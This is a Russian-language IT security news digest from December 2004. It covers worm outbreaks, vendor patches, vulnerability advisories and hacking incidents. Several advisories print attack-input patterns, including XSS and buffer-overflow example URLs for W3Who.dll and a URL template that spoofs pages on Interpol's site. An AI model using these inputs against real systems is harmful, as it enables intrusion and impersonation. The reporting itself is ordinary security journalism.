«Лаборатория Касперского» сообщает о выходе новой версии межсетевого экрана для защиты домашнего компьютера от несанкционированного доступа — Kaspersky Anti-Hacker 1.7. Программа Kaspersky Anti-Hacker — это персональный межсетевой экран, обеспечивающий защиту компьютера под управлением операционной системы Windows от несанкционированного доступа к данным. Одно из основных технологических изменений, внесенных в Kaspersky Anti-Hacker 1.7, предназначено для пользователей Windows XP. Новая версия персонального файрволла обеспечивает поддержку недавно представленного компанией Microsoft пакета обновлений данной ОС — SP2. Помимо этого, в новой версии программы устранены недостатки, выявленные в предыдущих версиях продукта в процессе его использования. Результатом сотрудничества экспертов «Лаборатории Касперского» и пользователей Kaspersky Anti-Hacker 1.5 стало устранение всех зафиксированных случаев некорректной работы программы.
Источник

15/12/2004 18:57 Статистика попыток взлома госинформресурсов
ФСБ России в 2004 году выявила и пресекла свыше 600 тысяч попыток неправомерного проникновения в информационные ресурсы органов государственной власти РФ. Эти данные привел директор ФСБ Николай Патрушев, передает РИА «Новости». По словам Патрушева, в числе 600 тысяч попыток неправомерного доступа на информационные ресурсы органов государственной власти были пресечены более 69 тысяч проникновений на официальное интернет-представительство президента России. ФСБ и другими правоохранительными органами возбуждены 151 уголовное дело по признакам преступлений в сфере компьютерной безопасности, 20 человек осуждены.
Источник

15/12/2004 18:56 Проблемы информационной безопасности в СНГ
Актуальные проблемы развития сотрудничества стран СНГ в сфере информатизации обсуждались сегодня в белорусской столице. Здесь проходит 6-е заседание Координационного совета государств Содружества по информатизации. Как сообщил «Итар-Тасс» представитель Министерства информационных технологий и связи РФ, одними из важнейших на заседании будут вопросы, касающиеся обеспечения информационной безопасности стран СНГ. Члены Координационного совета также проанализируют выполнение межгосударственной программы создания сети информационно-маркетинговых центров. Они также обсудят вопросы реализации проектов создания сетей пунктов коллективного доступа к интернету и сотрудничества при создании информационных систем паспортно-визового контроля, в том числе с использованием биометрических данных.
Источник

15/12/2004 18:54 Вирусная эпидемия Zafi.D
Вирус-червь Zafi.D получил широкое распространение 14 декабря, а сегодня практически все антивирусные компании выпустили предупреждение о возможной вирусной эпидемии связанной с массовым распространением Zafi.D. Секьюрити-компания secunia выпустила уведомление с высоким (High Risk) рейтингом опасности. F-SECURE,NETWORK ASSOCIATES, SOPHOS, COMPUTER ASSOCIATES, PANDA ANTIVIRUS, SYMANTEC, TREND MICRO, а также «Лаборатория Касперского» и «Доктор Веб» выпустили свои предупреждения. Вирус -червь Zafi.D имеет несколько псевдонимов: Email-Worm.Win32.Zafi.d, Nocard.A@mm, W32.Erkez.D@mm, W32/Zafi-D, W32/Zafi.D.worm, W32/Zafi.d@MM, Win32.Zafi.D, Win32/Zafi.D.Worm, WORM_ZAFI.D. Червь распространяется в виде вложений в зараженные электронные письма, а также путем самокопирования по открытым на запись локальным сетевым папкам и через расшаренные папки систем файлообмена в виде файлов winamp 5.7 new!.exe и ICQ 2005a new!.exe. Тема и текст зараженных писем представляют собой поздравление с приближающимся Рождеством, в зависимости от доменного имени получателя текст может быть на английском, немецком, венгерском, русском, польском, итальянском, финском или французском языках. После инсталляции в систему, червь пытается помешать работе некоторых антивирусных программ и межсетевых экранов. Кроме того, червь устанавливает на зараженную машину бэкдор, позволяющий загружать на компьютер произвольные файлы и запускать их на выполнение.
Бюллетень

15/12/2004 18:54 Обновления для Adobe Acrobat
Adobe выпустил обновления, закрывающие множественные уязвимости в Adobe Acrobat и Acrobat Reader, сообщает secunia. Первая уязвимость связана с неправильной обработкой текстовой строки при разборе ".etd" файлов, приводящая к выполнению произвольного кода на уязвимой машине при открытии eBook со специально сформированными полями "title" и "baseurl". Вторая ошибка связана с внедренными в PDF документ Flash объектами и позволяет получить содержимое файлов на машине пользователя. Кроме того подтверждены уязвимости в Acrobat связанные с libpng, которая используется в продукте. Все уязвимости присутствуют в версиях 6.0.0 - 6.0.2. Рекомендуется обновить версию до 6.0.3. Еще одна уязвимость присутствует в версиях под Unix начиная с 5.0.9 и более ранних, связанная с ошибкой в функции "mailListIsPdf()" и приводящая к переполнению буфера. Рекомендуется обновить продукт до версии 5.0.10.
Источники: Advisory 13471, Advisory 13474

15/12/2004 12:39 Декабрьские обновления от Microsoft
Microsoft выпустила очередную партию заплаток, закрывающих уязвимости в различном ПО этой компании. Все заплатки имеют рейтинг "важные". MS04-045 закрывает уязвимость в WINS Windows - серверов, позволяющую злоумышленникам выполнить произвольный код на уязвимой машине. Бюллетень MS04-044 посвящен уязвимостям в ядре (Windows Kernel) и LSASS, позволяющих повысить привилегия пользователя. MS04-043 закрывает брешь в популярной утилите HyperTerminal; эта уязвимость приводила к переполнению буфера и позволяла выполнить произвольный код. MS04-042 посвящен уязвимости DHCP Windows NT, позволяющей удаленно выполнить произвольный код или провести DoS (Denial Of Service) атаку на уязвимую систему. И наконец, MS04-041 правит WordPad, где в конвертере word - форматов присутствует ошибка, приводящая к переполнению буфера и как следствие возможности выполнения произвольного кода на уязвимой машине. Данная уязвимость присутствует во всех версиях Windows.
MS04-041
MS04-042
MS04-043
MS04-044
MS04-045

14/12/2004 13:59 Брюс Шнайер обновил свои рекомендации для пользователя сети Internet
Известный эксперт по информационной безопасности Брюс Шнайер (Bruce Schneier) обновил перечень своих рекомендаций по защите для обычных пользователей сети Internet "Safe Personal Computing", сообщает linux.org.ru. Эти рекомендации будут полезны как новичкам, там и профессионалам, ежедневно работающим с компьютером. Некоторые интересные рекомендации:
- отказ от операционной системы Microsoft Windows и использование Linux или Macintosh, цитата: "If possible, don't use Microsoft Windows. Buy a Macintosh or use Linux.".
- отказ от офисного пакета Microsoft Office и использование свободных альтернатив, цитата: "Look into one of the free office suites as an alternative to Microsoft Office.".
- отказ от программы просмотра содержимого WWW Microsoft Internet Explorer, цитата: "Don't use Microsoft Internet Explorer, period.".
- отказ от почтовых программ Microsoft Outlook и Outlook Express, цитата: "Don't use Outlook or Outlook Express.".
Самому автору приходится использовать Microsoft Windows и Office, но он заменил почтовую и программу просмотра WWW содержимого на Opera и Eudora Mail.
Статья

14/12/2004 13:37 Американский софт может лишиться защиты авторскими правами
На программное обеспечение не должны распространяться авторские права, утверждает американский консультант по интеллектуальной собственности Грег Аарониан (Greg Aharonian). В понедельник он подал соответствующий иск в суд Сан-Франциско, сообщает Reuters. Аарониан считает, что программы должны охраняться исключительно патентами, которые защищают саму идею, а не форму ее выражения, как созданные изначально для защиты литературных, музыкальных и иных художественных произведений авторские права. Целью поданного им иска является прояснение американских законов, используемых компьютерной индустрией для защиты прав интеллектуальной собственности. В настоящее время крупные изготовители программ, как, например, корпорация Microsoft, пользуются как авторскими правами, так и патентами. Кроме того, перед установкой программы пользователь зачастую должен принять дополнительное соглашение об использовании продукта. Аарониан считает, что авторское право не обеспечивает четкого понимания того, как именно оно должно использоваться. По его мнению, это вносит сумятицу в дела по защите прав авторов программ. Авторские права принадлежат создателю любого произведения. Они предоставляют автору исключительные права на созданное им и продолжают действовать в течение некоторого времени после его смерти (в США - 70 лет). Патент действует исключительно на территории выдавшего его государства в течение более короткого периода времени, как правило, 15 - 20 лет. Патент получить труднее, так как необходимо доказать новаторство самой идеи, а не формы ее выражения, но он предоставляет автору большую защиту, в том числе и в суде, отмечает Аарониан.
Подробности

14/12/2004 13:25 Европейцы создадут четвертый по мощности суперкомпьютер в мире
Несколько европейских институтов объявили о решении создать четвертый по мощности суперкомпьютер в мире, сообщает агентство Reuters. Чтобы не тратить лишние деньги, они решили объединить в сеть уже имеющиеся четыре суперкомпьютера меньшей мощности. После того как их соединят с помощью специального программного обеспечения через высокоскоростную сеть, они станут работать как один мегакомпьютер. Новый компьютер позволит ученым проводить исследования, которые раньше были невозможны. В частности, специалисты смогут производить сложные расчеты по материаловедению, космологии, ядерному синтезу, биологии и медицине, вычислительной гидродинамике и энвиронике. Суперкомпьютер вступит в строй весной 2005 года. В его создании участвуют институт IDRIS при французском Национальном центре научных исследований, Исследовательский центр Юлих при Вычислительном центре Гархинг и Институт физики плазмы имени Макса Планка в Германии, а также Consorzio Interuniversitario, объединяющий ряд итальянских университетов. Между тем, еще один аналогичный суперкомпьютер собираются запустить британские институты EPCC и Европейский центр среднесрочных прогнозов погоды при участии институтов CSC в Финляндии и SARA в Нидерландах. Этот проект стартует во второй половине следующего года при поддержке IBM.
Lenta.Ru

14/12/2004 12:42 Недельный отчет о вирусах от Panda Software
Вышел очередной еженедельный отчет от Panda Software. В сегодняшнем отчете рассмотрены четыре червя: Maslam.A, Maslam.B, Atak.D и Atak.E. Maslam.A и Maslam.B заражают компьютеры под управлением Windows 95/98/ME/NT/2000/XP, используя брешь LSASS. Они рассылаются по электронной почте, используя собственный SMTP механизм. Другие два червя - это варианты D и E червя Atak, который распространяется по электронной почте в сообщении с варьирующимися характеристиками. Эти сообщения содержат прикрепленный файл с расширением bat, com, exe, pif или scr. Иногда файл запакован в виде zip-архива. Оба червя подменяют адрес отправителя, чтобы ввести получателя в заблуждение.
Подробнее

13/12/2004 17:12 Две уязвимости в phpBB Attachment Mod
Secunia сообщает о двух уязвимостях в Attachment Mod модуле для phpBB, которые могут быть использованы злоумышленниками для проведения атаки на уязвимую систему. 1) Ошибка проверки входящей последовательности позволяет добавить, удалить или выполнить файлы находящиеся вне директории для загрузки (upload) файлов, выполнив "directory traversal" атаку. 2) Ошибка в "mod_mime" при обработке нескольких расширений файлов может позволить злоумышленнику загрузить произвольный скриптовый файл.Уязвимости присутствуют в версии 2.3.10. Предыдущие версии также могут быть уязвимы. рекомендуется обновить версию до 2.3.11.
Источник
Патч

13/12/2004 17:10 Тюменский хакер "обул" свое предприятие
Тюменская региональная интернет-газета сообщает о другом случай взлома. На этот раз по данному факту возбуждено уголовное дело. Хакер, забравшийся в базу данных одного из крупнейших предприятий Тюмени, смог повысить зарплату не только себе, но и ряду водителей транспортного цеха. Оказалось, что экономист по труду, обслуживавший всех работников предприятия, провернул аферу и проникнув в базу данных бухгалтерской программы "Заработная плата", находящейся на общем диске в одной локальной сети умудрялся не сходя со своего рабочего места взламывать код и вносить нужные изменения в программу. По долгу службы он знал время, когда бухгалтерия заносит в базу данных сведения о заработной плате, и сам вносил изменения. Чтобы сразу не попасться, он решил использовать одного из водителей, предложив ему повысить зарплату на тысячу рублей, но с условием, что тот должен будет отдавать часть суммы "изобретателю". Таким образом в период с августа по декабрь он привлёк ещё нескольких водителей к получению "повышенной зарплаты", пока нормировщик цеха не заметила несоответствия. Интересно, что программисту ОАО периодически поступала информация о сбоях в программе и её недоступности. Но, он "находился в отпуске и не мог предпринять каких-либо мер по выявлению хакера", говорится в газете. По факту мошенничества в Главном следственном управлении при ГУВД Тюменской области возбуждено уголовное дело.
Источник

13/12/2004 15:25 Firefox 1.0: браузер скачали уже 10 миллионов раз
Firefox 1.0, открытый браузер, созданный Mozilla Foundation, преодолел отметку в 10 миллионов скачиваний чуть более чем за месяц. 11 декабря 2004 была зафиксирована десятимиллионая закачка в то время, как релиз Firefox 1.0 состоялся 9 ноября. Кроме того, организаторы акции рекламы браузера в газете «New York Times» сообщают, что наконец-то завершили работу над макетом, который в ближайшее время увидят миллионы людей. Ожидается, что публикация рекламы Firefox 1.0 появится в выпуске «New York Times» за 15 декабря (в среду).
Источник

13/12/2004 15:24 Вышел KNOPPIX 3.7
Вышла новая версия популярнейшего LiveCD (т.е. работающего прямо с компакт-диска и не требующего установки на жесткий диск) Linux-дистрибутива KNOPPIX — 3.7. Среди изменений в релизе 3.7:
— обновления программных пакетов: Linux-ядра 2.4.27 и 2.6.9 (с ACPI), KDE 3.3.1 (из Debian/unstable), FreeNX 0.2.5, Java 1.4.2_06 (устранена уязвимость в безопасности);
— большее число поддерживаемых видеокарт;
— утилита isdntool-knoppix для простой (с текстовым и графическим интерфейсами) настройки ISDN.
Источник

13/12/2004 15:24 RedHat выпустила исправления для imlib
RedHat выпустила исправления для imlib, которые закрывают недавно обнаруженную уязвимость, присутствующую в этой библиотеке. Об уязвимости, вызникающей из-за различных переполнений целочисленных переменных при декодировании изображения и приводящей к переполнению буфера, сообщал 7 декабря Pavel Kankovsky.
Описание уязвимости
Обновление от Red Hat

13/12/2004 15:23 Линукс Центр взломали
Популярный российский сайт, специализирующийся на продаже Linux-дистрибутивов, — LinuxCenter.ru — 12 декабря был взломан. В заголовке всех страниц магазина появилась надпись «From Tver whis love =) r00tk1t», а и в самом верху слева - сообщение «owned by r00tk1t». Вот что сообщается на самом LinuxCenter.ru: "12 декабря c 7:00 до 15:00 по московскому времени из-за хакерского взлома на портале www.linuxcenter.ru была нарушена работоспособность интернет-магазина и главной страницы сайта. При этом разделы Библиотека и Новостной Канал ЛинуксЦентра работали нормально. FTP-архив ЛинуксЦентра ftp.linuxcenter.ru, который размещен на отдельном физическом сервере, не пострадал. В 15:00 команда ЛинуксЦентра восстановила нормальную работу интернет-магазина и устранила проблему безопасности." Как выяснилось позже, взломщиком оказался хакер под псевдонимом r00tk1t. По его словам, получив доступ к серверу www.linuxcenter.ru через скрипт phpBB, установленный на одном из сайтов на том же виртуальном хостинге, он просто хотел указать администрации на брешь в защите, но слегка перестарался. Хакер r00tk1t извинился перед командой ЛинуксЦентра и перед посетителями сайта за причиненные неудобства, и дело закончилось миром.
Подробнее

10/12/2004 17:30 Уязвимость в Internet Explorer
Похоже, эти два дня проходят под девизом: "Найди уязвимость в браузере". Вслед за предыдущими уязвимостями последовало сообщение от господина из Индии Gregory R. Panakkal, в котором автор извещаетт о существовании уязвимости в популярном браузере Internet Explorer, позволяющей предположить, существует ли некое приложение на машине клиента (то, что называется Local File Detection). Для использования уязвимости используется специфический тэг "sysimage://", который фактически является собственным изобретением M$ И предназначен для того, чтобы вывести либо изображение иконки приложения (если оно существует), либо изображение папки в случае отсутствия файла. Используя события onLoad и onError, автор демонстрирует подобную уяязвимость на своей странице. Остаётся только добавить, что уязвимость тестировалась на MS IE 6.0 SP1 в Win2K SP4 со всеми крайними патчами.
Демонстрация

10/12/2004 17:01 Графический антивирус Dr. Web для Linux
Еще один антивирусный продукт выпущен компанией «Доктор Веб» для бета-тестирования. Это — антивирусный сканер с графическим интерфейсом, предназначенный для антивирусной защиты рабочих станций, работающих под управлением различных Linux-систем. Для бета-тестирования предлагается версия 4.32.3 сканера, которая в настоящее время может быть установлена на следующих Linux-платформах: Alt Linux (версии Compact 2.3, Master 2.2 и 2.4); Red Hat 7.3, 9; Fedora Core 2; SUSE Linux 9; Mandrakelinux 10.
nixp.ru

10/12/2004 16:59 Официальный выход NetBSD 2.0
Вышла новая версия операционной системы NetBSD — 2.0.
Среди главных изменений в ядре последнего стабильного релиза NetBSD:
— Порты на новые платформы (amd64, evbsh5 и xen); — Родная поддержка потоков (на базе Scheduler Activations); — Порты на i386, amd64, macppc и SMP теперь поддерживают SMP; — Улучшения Linux-эмуляции в NetBSD: поддержка Sun JDK/JRE для Linux;
- kqueue(2) — структура уведомлений о сообщениях ядра; среди поддерживаемых kqueue событий: сокеты, файлы, каталоги, fifo, каналы, tty, изменения в устройствах, наблюдение за процессами и сигналами; и т.д. Подробный обзор новшеств публикует opennet.ru.
Источник

10/12/2004 16:56 Новый троян Prutec
Компания Computer Associates зафиксировала появление очередной вредоносной программы, получившей название Prutec. Троян Prutec попадает на компьютер в виде упакованного UPX исполняемого файла размером 44544 байта, передает «Компьюлента». После активации Prutec регистрируется в ключе автоматического запуска реестра Windows и затем пытается установить соединение с веб-сайтом prutect.com. Если это удается, вредоносная программа загружает с данного интернет-ресурса дополнительные компоненты. Кроме того, троян способен обходить некоторые средства безопасности. К счастью, на сегодняшний день Prutec широкого распространения не получил.
Источник

10/12/2004 16:55 Sophos: 2004 был годом Netsky и фишинга
Еще две декады до нового года, а антивирусные кампании начали подводить итоги. Sophos представил свой отчет. Согласно ему, компьютерный червь Netsky-P, предположительно написанный немецким тинейджером, стал самым распространенным вирусом 2004 года, выведшим из строя компьютеры десятков тысяч компаний и домашних пользователей. На долю Netsky-P приходится четверть случаев заражения, отслеженных компанией. Еще четыре штамма этого вируса заняли разные места в топ-десятке самых вредоносных программ, опубликованной Sophos. «2004 был годом Netsky», — пишет старший технологический консультант Грэхем Клули (Graham Cluley) в докладе по вирусам, найденным с декабря 2003 по ноябрь 2004. Несмотря на солидный возраст — 8 месяцев с момента появрения — вирус по-прежнему лидирует по количеству случаев заражения. Вызвавший переполох код Sasser, атакующий Windows-системы через уязвимость в службе LSASS, занял лишь третье место. В уходящем году специалисты Sophos столкнулись также и с новым типом фишинга, использующим троянские программы. Вместо того, чтобы обманным путем побуждать пользователя отправлять свои банковские реквизиты, его направляют на сайт с троянским кодом, который сам забирает все, что нужно фишеру.
Источник

10/12/2004 16:54 Вирус Maslan-C против чеченских сепаратистов
Появившийся в интернете вирус Maslan-C выдает себя за фотографию обнаженной модели, но на самом деле пытается организовать DDoS-атаку против сайта чеченских сепаратистов. По информации The Register, Maslan-C распространяется по почте в виде письма с заголовком "123" и вложенным файлом Playgirls2.exe. Если файл запустить, компьютер будет заражен и каждый первый день очередного месяца начнет забрасывать бесполезными запросами сайты чеченских сепаратистов, играющих важную роль в пропагандистской войне против Кремля. Как выразился по этому поводу главный консультант компании Sophos Грэхэм Клули (Graham Cluley), "тот, кто написал этот вирус, явно хочет помешать чеченским сепаратистам распространять информацию о своей борьбе, но [какова бы ни была его цель] использование вирусов [в информационной войне] – однозначно является преступлением".
Источник

10/12/2004 16:53 Ошибки в Squid 2.x
Artur Szostak сообщил об уязвимости в Squid 2.x, которая можетбыть испоьзована злоумышленниками для получения потенциально конфиденциальной информации. Уязвимость возникает из-за ошибки при выдаче сообщения о неправильном имени хоста. Это сообщение в некоторых случаях может содежать случайную информацию о других запросах. Уязвимость подверждена в Squid-2.5 для всех платформ. Выпущет патч.
Источники: squid-cache.org, secunia.com

10/12/2004 16:50 Переполнение буфера в Linux Kernel
Некто Jeremy Fitzhardinge сообщил о возможных уязвимостях в Linux Kernel 2.6.x, связанных с ошибкой при проверке границ буфера в функциях "sys32_ni_syscall()" и "sys32_vm86_warning()", что теоритически может привести к перполнению буфера.
Источники: ussg.iu.edu, secunia.com

10/12/2004 16:49 Ошибки в rootsh
Также сообщается об обнаруженной ошибке в rootsh, которая позволяет локальным пользователям обойти логирование. Проблема заключается в неправильной проверке при обработке некоторых xterm эскейп-последовательностей, что может привести к генерации пустых syslog- сообщений, что врезультате может позволить злоумышленникам скрыть свои действия. В новой версии (1.4.1) ошибка исправлена.
Источники: sourceforge.net, secunia.com

10/12/2004 16:48 Уязвимость Microsoft Internet Explorer FTP
Некто Albert Puigsech Galicia обнаружил очередную уязвимость Microsoft Internet Explorer. На сей раз она связана с неправильной проверкой FTP URL-ов и может быть использована, например специально созданными веб-сайтами, для внедрения произвольных FTP команд в текущую FTP сессию путем специально сформированных имен файлов, содержащих символ "%0A". Уязвимость подтверждена на полностью пропатченных системах Microsoft Windows 2000 SP4 / XP SP2 с Internet Explorer 6.0. Также сообщается о существовании такой же уязвимости в браузере Konqueror, применяемом в мире открытых систем, в частности, в среде KDE.
Источники: www.7a69ezine.org, secunia.com,

10/12/2004 15:43 Sophos: Netsky-P — самый грозный вирус 2004 года
Вирус Netsky-P возглавил список самых разрушительных компьютерных эпидемий 2004 года. Согласно отчету, опубликованному в среду секьюрити-фирмой Sophos, в этом году число новых вирусов увеличилось почти на 52%. На долю Netsky-P пришлось 22,6% всех известных Sophos инцидентов, вызванных вирусами. Netsky-P впервые появился в марте; это один из тридцати с лишним вариантов дебютировавшего в феврале оригинального червя массовой почтовой рассылки Netsky. «Просто удивительно, что Netsky-P и Zafi-B до сих пор заражают компьютеры, несмотря на то, что антивирусные компании уже несколько месяцев предлагают защиту от них, — комментирует старший консультант Sophos по технологии Грэм Клули. — Это указывает на то, что большинство людей до сих пор не обновило свои антивирусы, и мы убеждены, что в первую очередь их цепляют главным образом домашние пользователи, от которых потом заражаются предприятия. Антивирусное ПО нужно обновлять несколько раз в день». Второе место занимает червь массовой почтовой рассылки Zafi-B, на долю которого в этом году пришлось 19% всех вирусных атак. Sasser, быстро распространяющийся вирус, свирепствовавший в апреле, несет ответственность за 14% сообщений о вирусах и занимает третье место в списке. Свен Яшан, признавшийся в авторстве червей Netsky и Sasser, был арестован полицией Германии в мае и предстанет перед судом в начале будущего года. Однако его вирусы продолжают жить — по данным Sophos, с ними связано свыше 50% всех отчетов о вирусных атаках.
Подробности

10/12/2004 12:14 Secunia: во всех браузерах содержится опасная "дыра"
Специалисты компании Secunia обнаружили серьезную уязвимость практически во всех популярных веб-браузерах, включая Internet Explorer, Mozilla/Firefox, Opera, Konqueror, Safari и Netscape. Уязвимость позволяет злоумышленнику загрузить инфицированную веб-страницу, не меняя адреса в поле ввода URL. «Угон» браузера возможен даже при наличии блокировки всплывающих окон. Суть уязвимости заключается в возможности установить в JavaScript таймер на событие выгрузки страницы (OnUnload). Когда пользователь уходит со страницы злоумышленника на другую, таймер срабатывает через заданное время и выполняет сценарий с предыдущей страницы.
Уязвимость в IE
Уязвимость в Opera
Уязвимость в Safari
Уязвимость в Mozilla/Firefox
Уязвимость в Netscape

10/12/2004 11:45 Уязвимость во многих браузерах
Niek van der Maas из голландской компании MaasOnline сообщает об обнаружении уязвимости во многих интернет-браузерах, основанных на движке Gecko. Автором было обнаружено, что при обработке онлайн JavaScript-сценария, который выполняет печать с использованием тэга 'IFRAME' (window.frames.pocframe.print()), происходит "сваливание" браузера. Также утверждается, что отка браузера не происходит при выполнении JavaScript внутри тэга 'onLoad' и при следовании по ссылке 'onclick'. Патча пока не существует. В качестве меры противодействия реклмендуется отключить JavaScript в браузере.
Описание уязвимости

10/12/2004 11:20 Конкурс инструкций от сисадминов
В Новый год с новой рабочей инструкцией призывает вступить конкурс для сисадминов и пользователей "Каждый юзер должен знать", который стартовал на СОФТ@Mail.Ru на этой неделе. Участникам предлагается составить рабочую инструкцию, которая поможет юзерам и сисадминам понимать друг друга с полуслова. Чтобы решать возникающие проблемы юзеров быстро и качественно и при этом успевать выполнять свои основные обязанности, сисадмину просто необходимы понимание со стороны пользователей и их способность точно описать свою проблему. 99% сисадминов тут же скажут, что на это юзеры в большинстве своем практически не способны. Исправить эту плачевную ситуацию поможет четкая инструкция для пользователей, специально созданная их любимым сисадмином. Основное требование к инструктажу только одно: он должен реально облегчать жизнь и пользователю, и сисадмину, то есть приносить одну сплошную пользу. Организаторы конкурса решили дать высказаться и противоположной стороне – пользователям. Им также предлагается написать некую инструкцию для системного администратора. Возможно, от этого также будет польза Как известно, профессия системного администратора в официальных документах не фигурирует, зато присутствует множество других профессий и специальностей. Поэтому кроме конкурса рабочих инструкций для пользователей на сайте конкурса проводится блиц-опрос на тему официального названия должности сисадмина в компании. Победители конкурса «Каждый юзер должен знать» будут определяться по итогам голосования. Результаты должны стать известны широкой общественности как раз к Новому году. Планируется, что авторы лучших инструкций получат новогодний подарок – постер с лучшей инструкцией, которую можно будет повесить на всеобщее обозрение на своем рабочем месте или подарить самому любимому пользователю. Генеральный спонсор конкурса Учебный центр SoftLine (http://softline.ru/edu) предоставит главный приз - бесплатный курс обучения по администрированию Microsoft Windows Server 2003 или Exchange Server 2003. Сроки проведения конкурса: 1 декабря – 25 декабря. Инструкции на конкурс принимаются до 20 декабря включительно. 21 декабря начнется голосование, а победители станут известны в предновогодние дни.
Страница конкурса

10/12/2004 10:43 Тор50: впервые составлен рейтинг отечественных суперкомпьютеров
Во вторник, 7 декабря, Межведомственный суперкомпьютерный центр Российской Академии наук (МСЦ РАН), Научно-исследовательский вычислительный центр (НИВЦ) МГУ им. М. В. Ломоносова и компания «Т-Платформы» объявили о выпуске первой редакции списка 50 самых мощных суперкомпьютеров СНГ — Тор50. Системы, вошедшие в список, ранжированы по показателям реальной производительности, полученным на тестах Linpack в соответствии с мировым стандартом. Национальные и общемировые рейтинги суперкомпьютерных ресурсов существуют со второй половины 1980-х годов; наиболее крупный мировой рейтинг суперкомпьютеров — Тор500 — издается с 1993 года. У нас в стране информация по суперкомпьютерам до недавних пор была полностью закрытой. Отечественный рейтинг Тор50 стал первым и пока единственным источником информации о том, какими вычислительными мощностями располагают предприятия и организации в России и СНГ. Проект по созданию Тор50 был начат МСЦ РАН и НИВЦ МГУ в мае текущего года. Предполагается, что в дальнейшем новые редакции списка будут появляться два раза в год: в марте и в сентябре. Таким образом, следующая редакция должна выйти уже через три месяца (март 2005 года). По словам заместителя директора НИВЦ МГУ Владимира Воеводина, во второй редакции списка можно будет увидеть «много нового»: в первой редакции отсутствуют данные о некоторых крупных вычислительных системах, установленных на территории СНГ.
Top50

10/12/2004 09:31 На официальном сайте Интерпола любой желающий может "объявить в розыск" кого угодно
На сайте международной правоохранительной организации "Интерпол" пользователями Интернета была обнаружена уязвимость, позволяющая любому желающему создать в рамках сайта страницу с произвольной фотографией и подписью к ней. Как описывает в своем интернет-дневнике выпускающий редактор издания MosNews.com Николай Данилов, чтобы воспользоваться уязвимостью, нужно сформировать адресную строку (URL) вида http://www.interpol.int/ Viewer/viewphoto.asp? ImageName=[адрес фотографии] &Text=[произвольный текст]. Фотография может быть любая и может находиться в произвольном месте в Интернете. Текст также может быть любой. Если зайти с помощью браузера по сформированному таким способом адресу, то в результате на подлинной странице сайта Интерпола появится указанная пользователем произвольная фотография и введенный им текст. Такую страницу можно легко принять за реально размещенную на сайте этой организации информацию. Таким образом можно, например, фальсифицировать сообщения о том, что кого-либо якобы разыскивает Интерпол - это может быть использовано в разных целях - например, для розыгрышей. Использовав некоторые особенности формирования URL (заменив буквы кодами), можно сделать адрес менее "очевидным" и выглядящим более "техногенно". Предположительно, подобная особенность является следствием недосмотра (по мнению некоторых экспертов - низкой квалификации) создателей программного обеспечения для сайта. По всей вероятности, после появления сообщений в СМИ уязвимость будет через какое-то время исправлена и вышеприведенная ссылка на сфабрикованную страницу в таком случае может не приводить к описанному результату.
Более подробно

9/12/2004 18:27 Компьютерщики угрожают Бушу "цифровым Перл-Харбором"
Американская ассоциация компаний, специализирующихся на компьютерной безопасности, (CSIA) опубликовала обращение к государственному руководству США, в котором призвала администрацию Джорджа Буша в кратчайшие сроки самым серьезным образом заняться вопросами национальной безопасности в Интернете - в частности, предлагается ввести руководящую должность по этому вопросу в Министерстве национальной безопасности (Homeland Security). По мнению членов ассоциации, в настоящее время в Интернете сложилась весьма опасная ситуация, малозаметная широким массам, которые хорошо научились пользоваться Интернетом в своих целях, но плохо представляют себе технологические особенности его работы и возможные риски. С ростом числа пользователей глобальной сети ощутимо меняется социальная обстановка в ней, и становится очевидной необходимость применения там мер безопасности в той же степени, что и в "реальном мире". В настоящее время многие мировые организации различного рода, в том числе госструктуры, крупные компании и финансовые учреждения активно применяют интернет-технологии для передачи информации критичной степени важности. При этом защите информации зачастую не уделяется должного внимания, во многих случаях используются программные продукты, подверженные несанкционированному стороннему проникновению. В то же время в Интернете быстрыми темпами распространяется киберпреступность, Сетью активно пользуются экстремисты и террористы, создаются сетевые вирусы, которые уже показали, что способны наносить мировой экономике ущерб на миллиарды долларов. Участники CSIA предупреждают, что в свете нынешней политической ситуации в мире возможна внезапная организованная атака против представленных в Интернете американских структур - специалисты назвали это "цифровым Перл-Харбором" по аналогии со знаменитой операцией японских войск во время Второй мировой войны.
Подробнее

9/12/2004 17:53 Уязвимость в Microsoft Browser Client Context Tool (W3Who.dll)
Некто Nicolas Gregoire обнаружил сразу несколько уязвимостей в Microsoft Browser Client Context Tool (ISAPI расширение - (библиотека W3Who.dll), входящее в состав Resource Kit для Windows 2000 Server/XP), сообщает Secunia. Уязвимость, которая оценена как "критичная", может быть использована для проведения cross-site scripting атаки на уязвимую систему. 1) Неверная последовательность, переданная в ISAPI расширение из-за неправильной обработки может позволить выполнение произвольного HTML и script- кода в броузере пользователя в контексте уязвимого веб-сайта. Пример: http://[host]/scripts/w3who.dll?bogus=[code]; 2) Недостаточная проверка HTTP заголовков также позволяет выполнить произвольный HTML и script- код; 3) Ошибка при проверке границ буфера при обработке параметров может привести к переполнению буфера. Пример длинного параметра: http://[host]/scripts/w3who.dll?AAAAAAAAA...[519 to 12571]....AAAAAAAAAAAAA. На данный момент не существует патчей, для временного решения проблемы рекомендуется удалить уязвимую библиотеку.
Источник

9/12/2004 15:12 "Лаборатория Касперского": обзор вирусной активности за ноябрь 2004
"Лаборатория Касперского" выпустила очередной обзор вирусной активности. В ноябрьской «Двадцатке» появилось 4 новые вредоносные программы: Bagle.au, Bofra.b, Sober.i, LovGate.ad. Повысили свой рейтинг вирусы Bagle.at, Mydoom.ab, Zafi.b, LovGate.w, Mydoom.r. А первая десятка сегодняшнего рейтинга выглядит следующим образом:
1. I-Worm.Bagle.at - 21%
2. I-Worm.Mydoom.ab - 11%
3. I-Worm.NetSky.q - 9%
4. I-Worm.Zafi.b - 8%
5. I-Worm.NetSky.aa - 7%
6. I-Worm.LovGate.w - 6%
7. I-Worm.NetSky.b - 5%
8. I-Worm.Bagle.au - 5%
9. I-Worm.Bagle.z - 3%
10. I-Worm.Mydoom.m - 2%
Подробнее

9/12/2004 15:12 StarForce разработала новое средство защиты от вирусов
